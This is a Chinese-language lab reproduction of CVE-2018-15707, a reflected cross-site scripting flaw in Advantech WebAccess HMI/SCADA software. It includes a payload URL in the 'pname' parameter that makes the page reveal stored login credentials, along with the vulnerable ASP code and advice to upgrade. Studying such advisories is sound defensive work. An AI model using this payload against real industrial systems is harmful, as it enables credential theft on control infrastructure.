Advantech WebAccess 跨站脚本漏洞:CVE-2018-15707复现

工控安全 2年前 (2022) admin
732 0 0

Advantech WebAccess 跨站脚本漏洞:CVE-2018-15707复现

Advantech WebAccess是中国台湾研华(Advantech)公司的一套基于浏览器架构的HMI/SCADA软件,该软件支持动态图形显示和实时数据控制,并提供远程控制和管理自动化设备的功能。

Part1
漏洞状态
漏洞细节
漏洞POC
漏洞EXP
在野利用


Part2
漏洞描述
Advantech WebAccess 8.3.1版本和8.3.2版本以及之前版本中由于未对’ pname ‘参数进行验证或过滤导致Bwmainleft.asp页面存在跨站脚本漏洞,远程攻击者可利用该漏洞获取登录凭据。
Advantech WebAccess 跨站脚本漏洞:CVE-2018-15707复现
漏洞名称

Advantech WebAccess跨站脚本漏洞

CVE编号

CVE-2018-15707

漏洞类型

跨站脚本漏洞

漏洞等级 中危(5.4)
公开状态 公开
时间线

2018.08.22 CVE分配

2018.10.22研华发布WebAccess 8.3.3修复漏洞

Part3
复现环境

1. 实验环境

渗透主机:Win10(192.168.33.1)

目标主机:winserver2008R2(192.168.33.139)

软件版本:Advantech WebAccess 8.2

2. 涉及工具

MozillaFirefox

3. 复现步骤

启动环境,目标主机启动,如下图:

Advantech WebAccess 跨站脚本漏洞:CVE-2018-15707复现

攻击者通过渗透主机Mozilla Firefox 访问如下url,登录系统。

http://192.168.33.139/broadWeb/bwconfig.asp?username=admin

攻击者通过渗透主机Mozilla Firefox 访问如下url。

http://192.168.33.139/broadweb/bwmainleft.asp?pid=1&pname=%22);alert(document.getElementsByTagName(%27script%27)[4].text);// 

Advantech WebAccess 跨站脚本漏洞:CVE-2018-15707复现

Part4
漏洞分析

通过分析代码发现在broadweb/bwmainleft.asp中存在一个反射型跨站脚本漏洞,因为’pname ‘参数没有被验证或过滤。此外,活动会话的凭据被写入HTML源代码中,可以由JavaScript客户端访问。

… snip …pname = Request.QueryString("pname") … snip … username = session("UserName")'get the password if adminif username = "admin" then  sql = "SELECT * FROM pUserPassword WHERE UserName='" + username + "'"else  sql = "SELECT * FROM pAdmin WHERE UserName='" + username + "'"end ifdbTab.open sql,cfgConn,3,2,1  'get the password from database based on the user name, note that only admin can actually log into dashboard hereif not dbTab.eof then  set tWAObj = Server.CreateObject("webdobj.webdraw")  GetUserPwdField dbTab, tWAObj, UsrArr  'get the password from db  pwd = UsrArr(0)  %>    <script>      //Logon the webservice to use all other webservices      logOnWebService("<%=username%>", "<%=pwd%>");      readNodeStatus("<%=username%>", "<%=pwd%>","<%=pname%>");    </script>… snip … 
Part5
修复建议

升级到研华WebAccess 8.3.3或更高版本。

SAFE
获取更多情报

联系我们,获取更多漏洞情报详情及处置建议,让企业远离漏洞威胁。
电话:18511745601

邮箱:[email protected]

漏洞分析回顾
Advantech WebAccess 跨站脚本漏洞:CVE-2018-15707复现Advantech WebAccess 跨站脚本漏洞:CVE-2018-15707复现

Advantech WebAccess 跨站脚本漏洞:CVE-2018-15707复现

Advantech WebAccess 跨站脚本漏洞:CVE-2018-15707复现

Advantech WebAccess 跨站脚本漏洞:CVE-2018-15707复现


北京安帝科技有限公司是新兴的工业网络安全能力供应商,专注于网络化、数字化、智能化背景下的工业网络安全技术、产品、服务的创新研究和实践探索,基于网络空间行为学理论及工业网络系统安全工程方法,围绕工业网络控制系统构建预防、识别、检测、保护、响应、恢复等核心能力优势,为电力、水利、石油石化、轨道交通、烟草、钢铁冶金、智能制造、矿业等关键信息基础设施行业提供安全产品、服务和综合解决方案。坚持IT安全与OT安全融合发展,坚持产品体系的自主可控,全面赋能客户构建“业务应用紧耦合、用户行为强相关、安全风险自适应、网络弹性稳增强”的主动防御和纵深防御相结合的安全保障体系。截至2021年底,公司主要产品已应用于数千家“关基”企业,其中工业网络安全态势感知平台已部署4000余家客户,虚实结合工业网络靶场服务超过50家客户。

Advantech WebAccess 跨站脚本漏洞:CVE-2018-15707复现

点击“在看”鼓励一下吧

Advantech WebAccess 跨站脚本漏洞:CVE-2018-15707复现

原文始发于微信公众号(安帝Andisec):Advantech WebAccess 跨站脚本漏洞:CVE-2018-15707复现

版权声明:admin 发表于 2022年4月21日 下午12:00。
转载请注明:Advantech WebAccess 跨站脚本漏洞:CVE-2018-15707复现 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...